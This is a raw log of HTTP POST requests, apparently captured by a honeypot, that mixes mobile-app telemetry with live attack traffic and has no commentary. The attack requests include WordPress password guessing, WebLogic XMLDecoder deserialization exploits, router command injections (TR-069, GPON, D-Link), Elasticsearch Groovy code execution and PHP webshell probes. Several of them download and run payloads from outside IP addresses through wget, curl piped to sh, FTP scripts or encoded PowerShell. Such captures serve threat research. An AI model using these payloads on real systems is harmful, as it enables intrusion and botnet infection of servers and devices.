Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ΩÉû/Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î”˚Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache

QaZalN6cNlMUlLnhHk5QGEOkdXaDN239s9xMKaDsMN2DMZvBlWu3X0Xbe4cZgdHYPR8dBkYd0SpsA7RE8ac1kiTuQ94N+phU0LnRaClptgK2RKbChwGX3P1BywpbBTC2fGWOZy3N8a6I+UAlSrnAu0wVg8YorBokfDrzY83ckoaNRpU22XXbX+5ItVLaL9WlKEvEFXhqcBPzHtbnhqDkBiQB48VwA3OTC3hJlmKScPp8D2Gg2VXpNu+Pmbeif2fAes+Td5GSB0HMot1lPvTH/80x5f70d/HwWYtVLNUG/VD87Mt7598WDlPURm9OdaKJEc3MxWe8wFynNBKfxWk8+rqk0VwA9bWJczygsu7AMtIbepPW5KB3Dqq00/W1wKD5rw9FLcOfVRwMgU+p500YA2CZfvAn/eAhRuHhs494vIs=

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 23
Cache-Control: no-cache

log=admin&pwd=666666666

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1039
Content-Type: multipart/form-data; boundary=5Ga2xib4F05UFlR9y2X6qLffshZtsESDA
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--5Ga2xib4F05UFlR9y2X6qLffshZtsESDA
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--5Ga2xib4F05UFlR9y2X6qLffshZtsESDA
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

302317
--5Ga2xib4F05UFlR9y2X6qLffshZtsESDA
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

5f5f82b8934a45ec485f14e777e35b58
--5Ga2xib4F05UFlR9y2X6qLffshZtsESDA
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--5Ga2xib4F05UFlR9y2X6qLffshZtsESDA
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--5Ga2xib4F05UFlR9y2X6qLffshZtsESDA--


POST http://admaster.union.ucweb.com/usetting/v1/fetch_config HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: admaster.union.ucweb.com
Content-Type: application/json; charset=utf-8
Content-Length: 259

{"vno":"1496039037390","configs":[{"anchor":"0","name":"app_data"}],"app_id":"5e9abf4638d337bb55007d1fd4244486","chk":"3f5220ca","info":{"sdk_ve":"3.0.10","pkg_ve":"10.9.0","pkg":"com.uc.browser.en","type":"1","device_hash":"af8795dc3d31775f","sdk_vc":"212"}}

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∏ÏÕËÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die((string)(111111111*9));

POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/3;chmod 777 3;./3`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>


POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496058185903
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2807

1.056aae48ee0f55ad48a00142f@e77f4dd0e2fdae30dbe89ae5dab79eeb8847698ae95046185f6dbee004792959>핇íív°xúÕYmsõH˛+.}∫ªıya®j? !X9û!RêpfiR!¿ƒãÇ$#HÌøÏ8≤„ÕÀfie◊ÂRï4∫üÈ~ûÓ˘CoUÜMo°wÿEU›EYo–CΩÛ^¥πÎ
˛Û°' ÚCAôö$aEç2∆CQÔ˜
y4Í6%!<ÂáÔ‚≤^nÀ]≤O bŸ_ÜQÊ7KYXäÇ&óá|[¯y{É2ø쀀®ää ⁄GEUuúÏ£ã›&©ˆeµæ †‹°xl∑˙v´˚‰.Ÿ7`iøÎ
DIÎ≤¢ ¢$IÁ_Û>Ëı~?j
Üq.À}ú©À¢¨r?˚a‹W
fiã>OA=«è¯•(ˇ∏)í¶ˆ?fls˜P˝pî%¡Êã˚Œ?Ë+[øÎD~˜∑z^Eiè!,ãY¥€˚’fiæã™0Çz˛ÃŸszΩ„fl¸5S±¨(Á‰ıÔ‚Ω¶®Çå^/Ô5EÎÀ¬7Û˛Â◊ãÙ™®º*i*ñd̵QIE,
¯’R	Iíä˛2*}∞>¬¯’ã„Q$Òõ¯ı∑Ù® Ú7Œøq®&2MC@öÄe¨í.ix$
ei§c¨Ë˛4˝ÖzÈ´≤"‚˛´’‡S’ó¢¸wΕ؈±–=z·xd	Q/ø˝˛€yoÌv¿]G7ˇ∞/∑˛:∫ˇƒfl-ˇ?¿¬CÂÛ<ı
yD~àmQÖ£ˇ0ÎöDZ¸„∞kö "ûëé,_Ω9AÊ∫¨Óì«„ÖFP$ıâaå%Uî·Nj~≤π´X}õ_N˘∑ß°Áa˘ûî…Íü~öߡyflrAπó¡˙ªo¨˜˜›ÛÓÓª¸x˘:ΩÅ$>}EÅÖè{D(R⁄Ûãí±‹•tÄÂãèUcÎ7_pÚ‹ÊÆ<T
A|~’˘=2(~l
¸]‹Ω}tÙ‚y–ãÆD·≥kÑ$iü‡ª—ìTbI¡_Ù¢)}
°ÉÙ=ÿ≈œÊV¨*ˇv©r}…
å/¢v¢?	}6ı%·¸wé_#Òsñ7©Ø<ı
fi{q‰áºÛ}Ë›˙IÖÀ*zÄñ∏Î˙A
gπ;¨ˆÕñ´ı◊wou0Ïo∑õ®Åœrfl˜#Iç"·Vñ˝PR}A%t{øg	Mu◊≈º'Ú2WEª2;ÏV4$¸KTéˇafl2(C.∏sá—]DÀ¯â»‰L∫r∆¸LP€≤Äm „Æè’›/Ç™Ñ=y¿Ga†ˆA†©É[<PC˛kEæ≠íbœ€˚—"C<lºÎŸvÂŒô·å€a5u÷Gb0D“±˚”Ó¿Í…ˆ⁄≠%œjö3DçÈ—v¬úì∆s∆5…ŸÒ¶ ∆—6€–Ù2'̶µ·[ÜÃL◊≥ö]g∑+kÅ<∑fC√ºµç¿Ω˘πÚÖ\‚¶„‘Àπgçq'-±X{SÿM<#Ñó€ÓÙH“{ÈX"È\Úú˘—3â>§€UAÊw◊»¨SCfiıeΪ⁄¡“'G{Ëø)®ruS$ãÄΩ1ë9ã
m√î∫ÓÀòZD¢ŒT≤<Ëò‰c∞Œ0q1±Ã‘và>zf˘¶8µ˝ôÂt"Scfií|*yÈ0ì܆Àî¶4O"úŸÓDb.”
|ô›Å•5°©¡IfYPxÒj∏
7Ÿ∂Q#e<Ùò∫c¬èö Ê,à‘ ≤gò‡¨µSôµã‰¶`h|ÙÚ1ú

POST http://api.vungle.com/api/v4/config HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 84

{"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache

RqQNwtyZYDB+H6iQxUMhQVNFR8ts2mEL1verFKUDDytmymhKDUqGsUmaaI32kVoHHUW7jGPmAHuaLldyaVcsybAV+NUJDgZagvFAknsc7laHGAWAJSAwpLbBNHSyAu8v76H8rVEj3GKzqARAbnYfxkboMqFR0k5gNCB8V7i+NmzokR64NwAphdLx13xnBNSy/USUSaBUEVS3cgr14ITj7z+JqqQSjMWCDqogbdRd9Fmi8QilizquhH/tHN6LkxoLTldAa/iAuGRpZFgRHh0zlrVv3DgxikTrVW2dNR3XZZidKV2LjDv7KZcp4RRlE9pSI6g5be0XnpM7ekC7pi5S4F1zGARtMwa8JcSdpNJSbIgR4Dz1J6HvHXApcJkRvnqWiA/WepR8TRwE0U9NZOY=

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 21
Cache-Control: no-cache

log=admin&pwd=admin11

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1301
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;@echo open 46.101.137.203&gt;sss.txt&amp;@echo binary&gt;&gt;sss.txt&amp;@echo get /taskhostxz.exe&gt;&gt;sss.txt&amp;@echo quit&gt;&gt;sss.txt&amp;@ftp -s:sss.txt -v -A&amp;@start taskhostxz.exe&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13

key=MKCT468MK

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache

QPdZxozINzXsbCKeEWC1Yd1Au687rCAhemhSZrE6zhJmoODC2oJI5/TYNpVNcFPQbmZhcAJQmHube3KT3zUNi4Mc99uyhd2DsXdQKzch8I/V6zxjyodBWHRWG3UyrQgjY8SB+J1zIufFmYvkU5na8NBlVfw4e/sgCTt/XEssu0PuKojlcdQB9yXlLrux1ZeHeb6bAidtnvPzprVF/BpUR2a9IA1N39SABJ57G/BUzZ691veoqv37aUq+Abk79TQbasSCIE0WmcXKPL91I7UNYcpEXFrzDdY2t537GeKOA61J7p5MOHcKM6PHxRot2LSp0aQw3q81V9bJIu4awH5aSpjUeMCkUvzEXI6E/7rgyKo+QWLy

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
`äQ<Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache

log=172&pwd=172abc

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden 

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Content-Type: gzip, deflate
Accept: */*
Content-Length: 103

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://149.28.96.126/80`&ipv=0


POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=ashley

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://149.9.1.132:6668/ HTTP/1.0
Content-length: 24
Connection: close

ho:128.199.140.88:8080


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
®}fi›Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

h=die('Hello, Peppa!');

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://f3.mi-stat.gslb.mi-idc.com/diagnoses/v1/report HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: f3.mi-stat.gslb.mi-idc.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 355

n=7694298728859&d=HCgAGAAYABgAABgHaHR0cGFwaRwYB2h0dHBhcGkYATAYFjQuNC40LVY3LjAuNS4wLktYRE1JQ0kYDG1vYmlsZS1IU1BBKxgOMTE0LjEyNC4yNDEuMTEcGAAYABgAGAAAGhwYE2FwcC5jaGF0LnhpYW9taS5uZXQZHBgSMTExLjIwNi4yMDAuMjo1MjIyFQAVAhZ%2BFQAbAAAAGA9jb20ueGlhb21pLnhtc2YYD2NvbS54aWFvbWkueG1zZhgWNC40LjQtVjcuMC41LjAuS1hETUlDSQAA&t=1494755725494&s=8D24A982DD5CAC25E98D0FFA078F22D4

POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache

SvYPk9/MZYbk6RyObrrkoTkxI9AdQjXRedpDpXY1sin5YHFSzzzD1sUXDT9OCY8A5/v3hnUSFImbMJPc62WpFoYam0TnRz68qZa3mCPikqIqDUUFw7zxnVJJvCI0HX6EvW8IMxbsInPU4CcPgFrTRh3RUS0h9jedD3zH1MytwLI4P5l9kkHZN7XEYnCShqlWCFRqAWGU8XcyQJVnTxqmIZvxe1Q5LtU8oaam96ASEukGA9bXq3D1BvupBEjQltSV7ov/tZaKj71D1qBth20Oz/dExDRLAmxAe/ObfTtY+LdSKknlsUS2SrB861ijZEkLVDpldnWHhgNoNPz7M31UIyCxvDzm6sLltPyGsvU6khyOh/t+Uhbg43d62OWrTARB3Ron5b6tZ9QxxXQBWbeLjr2aq9G/ry/4tiw7uJZGJ3CdGbs=

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; EIE10;ENUSMSN; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache

Ul23znRAAnXWh0DzLMG93QqBGSrlaKh9j+QiUwSO1U9lI65BSwLRLnS27uX4PCp8g9uUqNPYMGUmSEJxx/1f27wzkNvLznsZJr3br/NMMfgHwof37O9YWeVi4FYc4s1HSFg2pxY/HlFmFQJq+DA9nmnW0gNEfldUPwO2/6vLLHkgZvweb2Qdpqgvq7ffsA2X6DXx3n/XePzFKkED/vFgDOr5O3hLphMR8z84+Oo0Y3CQ2Ayok+VzXEcSs+tFGyosbzQLNNWngZPOEpB0flv2U8+nWTgNGjz85pFp338MI6CsTSwbI5amPtWcHPkIdXha0qeLdVkqiGf4cQ9tDWgAIwqiElDturm9LPiqOAEpuhC+WdUK+1XRNlNtdKNUnBffvXzahhTNXDKtPVyGrUN8w3mhF40SHD7muZBsqd6g

POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60

A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
pÈ!3Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1078
Content-Type: multipart/form-data; boundary=GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

61754
--GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

63a3f4d7d18da1ff2cfd38e684e2477f
--GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--GF1YgO1RPkM2LOoIhwPApm07YOqXi3KQ9CWlmypL
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

